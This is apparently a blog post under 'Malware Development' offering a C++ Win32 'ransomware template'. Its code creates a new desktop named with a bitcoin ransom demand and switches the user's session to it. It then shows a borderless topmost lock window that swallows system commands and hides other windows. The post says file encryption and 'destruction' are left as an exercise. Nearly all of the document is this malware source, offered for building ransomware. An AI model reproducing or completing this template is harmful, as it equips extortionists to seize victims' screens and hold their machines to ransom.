Generic Win32 Ransomware Template

Posted on December 20, 2020 - December 20, 2020 by admin

The following is a basic (C++) program to build out Win32 ransomware projects. It will let you “control” a Windows session’s terminal/screen. The file encrypting, transporting, ransoming, destruction, etc., are left as an exercise for the reader.

#include <Windows.h>
#include <WinGDI.h>

// Creates the single child button of the lock window and applies the shared font.
// Relies on the file-level globals `instance` (HINSTANCE) and `h_font`, both of
// which are assigned in Window::Init. Neither return value is checked.
void CreateWndContent0(HWND parent)
{
	HWND wnd;
	// Class name, caption, a hard-coded style bitmask and fixed geometry; IDC_BUTTON0
	// (defined outside this listing) is passed as the control id via the HMENU slot.
	wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
	SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}

// Window procedure for the lock window (class WND_CLASS_NAME0, created in CreateWnd0).
// Handles creation, the button click, system-menu commands and destruction; every
// other message is forwarded to DefWindowProc.
LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
	switch (msg)
	{
		case WM_CREATE:
			// Populate the window with its button as soon as it exists.
			CreateWndContent0(hwnd);
			break;

		case WM_COMMAND:
			switch (LOWORD(wparam))
			{
				case IDC_BUTTON0:
					// Button click: show a message box, then send WM_DESTROY directly to this
					// window (instead of calling DestroyWindow); that lands in the WM_DESTROY
					// case below, which posts WM_QUIT.
					MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
					SendMessageW(hwnd, WM_DESTROY, NULL, false);
					break;
			}
			break;

		case WM_SYSCOMMAND:
			// Returns without reaching DefWindowProc, so system-menu commands (the SC_*
			// codes, including close, move and size) are swallowed for this window.
			return true;
			break; // unreachable after the return above

		case WM_DESTROY:
			// Ends the message loop running on this window's thread (see Window0Thread).
			PostQuitMessage(0);
			break;
	
		default:
			return DefWindowProc(hwnd, msg, wparam, lparam);
	}
	return FALSE;
}

// Creates the borderless lock window, publishes its handle in the global hWindow0
// (read by Window::HideWindowProc), forces it topmost and shows it.
// Return values of the Win32 calls are not checked.
HWND CreateWnd0()
{
	HWND wnd;
	// WS_POPUP (no caption or border) at the screen origin with a fixed 1920x1080 size.
	wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
	// Author's TODO: get the screen size dynamically for the window.
	hWindow0 = wnd;
	// HWND_TOPMOST places it above all non-topmost windows; SWP_NOMOVE | SWP_NOSIZE keep
	// the geometry chosen above, SWP_SHOWWINDOW makes it visible.
	SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
	ShowWindow(wnd, SW_SHOWNORMAL);
	UpdateWindow(wnd);
	return wnd;
}	

// Thread entry point for the lock window. Binds the thread to the alternate desktop
// (hDesktop, created in Window::Init) before creating any window, since a window
// belongs to the desktop of the thread that creates it; then registers the window
// class, creates the window and pumps messages. `param` is unused.
DWORD WINAPI Window0Thread( LPVOID param )
{
	SetThreadDesktop(hDesktop); // New desktop where further windows are created.
	RegisterClasses(WndProc0, WND_CLASS_NAME0); // helper not shown in this listing
	CreateWnd0();
	MessageLoop(); // not shown; presumably runs until the WM_QUIT posted from WndProc0's WM_DESTROY
	ExitThread(0); // never returns, so the missing `return` statement is not reached
}

// Desktop/window-station handling for the lock screen: setup (Init), teardown (DeInit)
// and a callback that hides every window except the lock window.
namespace Window
{
	// Window-enumeration callback (signature matches WNDENUMPROC; the caller is not shown).
	// Hides each window whose root owner is not the lock window hWindow0 (set in
	// CreateWnd0). 3 is GA_ROOTOWNER. Both branches return true so enumeration continues.
	bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
	{
		if(GetAncestor(hwnd, 3) == hWindow0)
			return true;
		ShowWindow(hwnd, SW_HIDE);
		return true;
	}

	// One-time setup: stores the HINSTANCE, creates the shared font, creates a separate
	// desktop and switches the interactive session to it, then starts the thread that
	// builds the lock window on that desktop. Always returns true; none of the handles
	// obtained here are checked for failure.
	bool Init(HINSTANCE hInstance)
	{
		instance = hInstance;
		InitCommonControls();
		// Character height 13, normal weight, "Times New Roman"; applied to the button in CreateWndContent0.
		h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
				0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
				DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");

		// Sets the process window station to the one it already has.
		hWinsta = GetProcessWindowStation();
		SetProcessWindowStation(hWinsta);
		// The desktop name is a fixed string literal, i.e. an enumerable artefact of this
		// sample; the CreateDesktop + SwitchDesktop pair is what takes over the screen.
		hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
		hOldDesktop = GetThreadDesktop(GetCurrentThreadId()); // remembered so DeInit can switch back
		SetThreadDesktop(hDesktop); // All windows created under this desktop.
		SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
		
		// The window itself is built on its own thread, which also binds itself to hDesktop.
		hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
		return true;
	}

	// Tears down what Init set up: switches the session back to the original desktop,
	// then closes the desktop and window-station handles. The thread handle
	// (hThreadWindow0) and h_font are not released here. NOTE(review): the handle from
	// GetProcessWindowStation is documented as one that should not be closed — confirm.
	void DeInit()
	{
		SwitchDesktop(hOldDesktop); // Restore the old, original desktop. Because you're a nice boy ;)
		CloseDesktop(hDesktop);
		CloseWindowStation(hWinsta);
	}
}
Posted in Malware Development. Tagged c++, ransomware, template, win32
